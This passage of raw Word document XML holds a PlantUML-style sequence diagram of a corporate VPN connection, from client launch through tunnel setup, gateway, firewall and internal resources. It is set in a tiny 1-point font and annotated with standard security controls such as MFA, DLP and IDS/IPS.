                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">group #E8F0FE VPN setup &amp; internal routing </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BC986FA" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>User -&gt; Client: Launch VPN client</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D4BFBF7" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="370DEFB9" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Loads config (server, ports, protocols, ciphers)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB26081" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Checks creds/certs,  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="522CF59A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Initializes virtual adapter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D6EC64" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Applies kill switch/DNS leak protection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D376AD4" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="620A3130" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C0DE70A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Client -&gt; Internet: Create encrypted tunnel\n(IPsec / SSL/TLS / WireGuard)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C6533FC" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51884414" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Performs handshake &amp; mutual auth (certs, MFA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A8A514" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Negotiates keys with PFS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27D1ED19" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Assigns VPN IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B81A33C" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Sets routes/DNS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="776015C0" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Enables NAT traversal &amp; keepalives</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2F689A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01CCAD8C" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="242A7FEB" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Internet -&gt; Gateway: Send VPN traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7A2CB9" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2312713A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Encapsulates packets (ESP/TLS/UDP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="158E8481" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Enforces split/full tunnel rules</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="177E18D1" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Redirects DNS to corporate resolvers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8AB622" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Adjusts MTU/MSS to avoid fragmentation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="737A16A2" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC32E5A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33D602F2" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Gateway -&gt; Firewall: Decrypt &amp; forward internal traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="343BC5FF" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7427976F" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Verifies integrity &amp; anti</w:t>
            </w:r>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>‑</w:t>
            </w:r>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>replay</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE96853" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Maps to user identity &amp; role policies</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E53FA50" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Assigns internal source IP for routing/logging</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B6B7D0" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB67E01" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="560CC53A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Firewall -&gt; Corp: Route to corporate network</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F72C3E" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F692F20" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Applies ACLs, IPS/IDS, segmentation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2141A7FB" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - NAT/routing to correct VLAN/subnet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED61B5A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Optional malware/DLP inspection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E43D5D" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D12E165" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="785D938A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Corp -&gt; Resources: Request internal resources</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38F209A6" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3868EA2A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Uses internal DNS &amp; private endpoints</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BEC2453" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Trigger enterprise auth (Kerberos/LDAP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3A608B" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Protocols like SMB, RDP, SQL, HTTPS.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6396668C" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE8EF97" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="523C2874" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Resources --&gt; Corp: Send data back</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E8D79C" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47A463F9" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - TLS inside LAN for defense in depth</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="089C1B4E" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - PMTU discovery to avoid fragmentation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67D03CA0" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Logs tagged with user/VPN IP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB2B64B" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750831DC" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="566DC439" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Corp --&gt; Firewall: Pass through firewall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0DAFEC" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4422DC2E" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Matches state table for return traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0865BCB0" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - DLP/content filters on egress</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42045599" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
